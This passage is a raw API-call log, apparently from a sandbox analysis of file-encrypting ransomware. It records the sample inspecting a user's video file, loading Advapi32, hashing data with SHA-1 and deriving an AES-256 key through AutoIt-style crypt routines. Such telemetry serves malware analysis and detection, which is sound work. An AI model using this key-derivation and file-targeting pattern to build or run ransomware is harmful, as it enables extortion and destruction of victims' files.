HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.043] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0043.043] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.043] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9117ea0, ftCreationTime.dwHighDateTime=0x1d5bdcf, ftLastAccessTime.dwLowDateTime=0x86c483b0, ftLastAccessTime.dwHighDateTime=0x1d5c557, ftLastWriteTime.dwLowDateTime=0x86c483b0, ftLastWriteTime.dwHighDateTime=0x1d5c557, nFileSizeHigh=0x0, nFileSizeLow=0x108fc, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="H1IbodoXI-.flv", cAlternateFileName="H1IBOD~1.FLV")) returned 0x7c2240 [0043.043] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.044] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.044] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0043.044] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0043.044] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.044] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.044] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0043.045] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0043.045] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.045] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0043.045] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.045] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.045] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.045] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.045] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.045] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.045] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0043.046] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0043.046] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.046] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.046] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0043.046] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.046] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.046] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.046] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0043.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0043.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0043.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0043.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0043.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0043.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0043.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0043.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0043.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0043.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac2f0 | out: hHeap=0x770000) returned 1 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0043.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0043.049] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0043.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.049] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0043.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0043.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0043.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0043.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0043.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0043.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0043.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0043.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0043.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae9c8 [0043.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x7ae9c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0043.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0043.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0043.050] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0043.050] HeapFree (in: 